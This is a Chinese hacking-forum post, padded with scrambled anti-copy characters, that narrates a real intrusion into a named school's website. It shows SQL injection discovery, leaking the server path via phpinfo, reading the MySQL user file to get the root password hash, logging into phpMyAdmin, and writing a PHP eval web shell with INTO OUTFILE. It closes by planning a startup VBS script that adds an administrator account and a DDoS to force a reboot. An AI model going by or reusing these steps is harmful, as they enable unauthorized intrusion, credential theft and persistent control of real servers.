友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！

- x! e* N/ z4 W2 }2 T+ y' O9 j/ L4 x

0 H( ~9 V' P& q1 _' r常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
4 {0 L! Y$ ^; J9 ]! M6 s4 Z' z
那么想可以直接写入shell ，getshell有几个条件：
/ u; T) o$ C+ N- U$ m/ R$ t" Z# A7 l

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
0 y$ D: z+ \# F6 `
试着爆绝对路径：
6 \: S- F# Q1 k6 G1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
; s4 {! B6 i: V3 n. S" s4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 m& a0 y9 E4 w2 w2 g! S* R/ M5./phpmyadmin/libraries/select_lang.lib.php  
( j/ V& i' e- {7 _( H8 j" k- ]6./phpmyadmin/libraries/lect_lang.lib.php  
" A# O5 l; o* r  f& `7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
% V" X) D" o  n/ P* r6 b
( g  A5 Z1 z0 ?9 G3 Q均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
* N  R& I- I, T: R: R; x- N( }
) F$ |. o+ t* g  E/ x7 o. }, B权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
- z9 w' X$ i& G: S  a& e5 F: I" E
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
7 c( ]! s: T9 s7 {/ w
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
7 Z2 {' x2 f. X2 i& {3 W
8 |: @  W* S! ~% f$ g6 g# ohttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
9 K% I( L. w# t  F
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

) C" A0 B3 ~1 \成功读到root密码：

% X7 @; s% y) Y2 ^0 V1 C5 s, p17---- r(0072)
18---- o(006f)
19---- o(006f)
" [- Z# h% C4 d9 c- }20---- t(0074)
- I" O. s0 t5 W! D2 ^$ c21---- *(002a)
22---- 8(0038)
6 j' R6 h) ], o6 C% A8 n6 T) S23---- 2(0032)
9 d0 U2 T5 X, B. b$ Y- l+ t! f24---- E(0045)
# W- t5 R' C4 `5 Y8 Y$ L& p25---- 1(0031)
% h4 Y) K  l, ]: P/ u26---- C(0043)
# y- D  j  m6 I( W3 {) P27---- 5(0035)
28---- 8(0038)
5 i6 w* T0 ]1 V' C6 \" h$ K29---- 2(0032)
! m1 ~6 c& B/ x' u30---- 8(0038)
/ A& ?# x0 d; S5 A* y3 q% o31---- A(0041)
  m0 W& B; U2 |32---- 9(0039)
33---- B(0042)
34---- 5(0035)
+ n$ i* R& Q1 |' R7 ^: J; y' i35---- 4(0034)
8 I3 K+ l$ g8 Z36---- 8(0038)
37---- 6(0036)
. p' }9 Q  ?0 j* q3 I4 c/ _0 w7 z% N38---- 4(0034)
6 Z  \. F) U9 l5 p! i$ w0 s0 {0 k39---- 9(0039)
: h" I  e' v$ C4 z$ z) Q1 t* B) W40---- 1(0031)
7 d. Q+ b/ W4 W+ A& h41---- 1(0031)
42---- 5(0035)
. s4 F5 x# _3 ?$ L; ]43---- 3(0033)
& U3 Y  f) H+ _- |44---- 5(0035)
" `# R0 \; U. g; R45---- 9(0039)
, o7 G1 F9 W3 `; ?/ |, k46---- 8(0038)
47---- F(0046)
+ v7 X; [& @' M' R: g48---- F(0046)
49---- 4(0034)
50---- F(0046)
2 H. S$ H/ w9 Z2 n2 A# y0 X51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
6 D9 c( S; W; J4 ^5 o) u4 Z% p8 C54---- A(0041)
# X9 r7 z' s. Y  o3 x6 e55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
) w5 X/ f$ q- A0 \59---- *(0035)
60---- *(0041)
: h& |# w/ K6 G  s& e. R: b61---- *0032)

6 c' x. P5 u$ t, ?解密后成功登陆phpmyamin
$ e" }* N1 B2 E0 _7 M1 l                          

                             

/ D- O" V( x& ^找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
( }; k8 n9 c/ n1 s
! m- k2 O7 u: x" r+ u5 A成功执行，拿下shell，菜刀连接：
# t' H% C) X+ u' i
服务器不支持asp,aspx,php提权无果...................

2 N$ ]1 S, X& g但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
% b5 C( H5 X  g% \1 M1 ]! W

服务器上已经有个隐藏帐号了

别名     administrators
- ?# o3 g& F/ Q5 K7 a, X0 f+ U, P注释     管理员对计算机/域有不受限制的完全访问权

+ O) g. {1 m4 [: M

成员

-------------------------------------------------------------------------------
admin
Administrator
slipper$
sqluser
命令成功完成。
7 I! l% `9 C, M* {0 a& Y1 ]7 o
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
9 l9 T% Q1 I5 c1 c, y* \
      

angel